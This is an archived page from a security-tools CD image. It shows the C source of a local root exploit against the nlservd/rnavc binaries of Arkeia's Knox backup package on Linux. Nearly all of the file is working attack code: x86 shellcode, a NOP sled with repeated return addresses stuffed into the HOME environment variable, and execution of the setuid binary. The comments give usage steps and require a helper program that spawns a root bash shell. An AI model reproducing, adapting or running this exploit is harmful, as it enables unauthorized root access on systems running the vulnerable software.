home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / linux / local / knox.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  1.7 KB  |  85 lines
  1. /*
  2.  * nlservd/rnavc local root exploit for Linux x86 tested on SuSE 6.2
  3.  * exploits Arkiea's Knox backup package.
  4.  * gcc -o knox knox.c
  5.  * ./knox <offset> <buflen>
  6.  *
  7.  *
  8.  * NOTE: you *MUST* have void main(){setuid(geteuid());
  9. system("/bin/bash");}
  10.  *       compiled in /tmp/ui for this to work.
  11.  *
  12.  * To exploit rnavc, simply change the execl call to
  13. ("/usr/bin/knox/rnavc",
  14.  *                                                  "rnavc", NULL)
  15.  * -Brock Tellier btellier@webley.com
  16.  */
  17.  
  18.  
  19. #include <stdlib.h>
  20. #include <stdio.h>
  21.  
  22. char exec[]= /* Generic Linux x86 running our /tmp program */
  23.   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  24.   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  25.   "\x80\xe8\xdc\xff\xff\xff/tmp/ui";
  26.  
  27.  
  28.  
  29. #define LEN 2000
  30. #define NOP 0x90
  31.  
  32. unsigned long get_sp(void) {
  33.  
  34. __asm__("movl %esp, %eax");
  35.  
  36. }
  37.  
  38.  
  39. void main(int argc, char *argv[]) {
  40.  
  41. int offset=0;
  42. int i;
  43. int buflen = LEN;
  44. long int addr;
  45. char buf[LEN];
  46.  
  47.  if(argc > 3) {
  48.   fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
  49.  exit(0);
  50.  }
  51.  else if (argc == 2){
  52.    offset=atoi(argv[1]);
  53.  
  54.  }
  55.  else if (argc == 3) {
  56.    offset=atoi(argv[1]);
  57.    buflen=atoi(argv[2]);
  58.  
  59.  }
  60.  else {
  61.    offset=2800;
  62.    buflen=1200;
  63.  
  64.  }
  65.  
  66.  
  67. addr=get_sp();
  68.  
  69. fprintf(stderr, "Arkiea Knox backup package exploit\n");
  70. fprintf(stderr, "For nlservd and rnavc\n");
  71. fprintf(stderr, "Brock Tellier btellier@webley.com\n");
  72. fprintf(stderr, "Using addr: 0x%x\n", addr+offset);
  73.  
  74. memset(buf,NOP,buflen);
  75. memcpy(buf+(buflen/2),exec,strlen(exec));
  76. for(i=((buflen/2) + strlen(exec))+3;i<buflen-4;i+=4)
  77.  *(int *)&buf[i]=addr+offset;
  78.  
  79. setenv("HOME", buf, 1);
  80. execl("/usr/knox/bin/nlservd", "nlservd", NULL);
  81.  
  82.  
  83. }
  84.  
  85.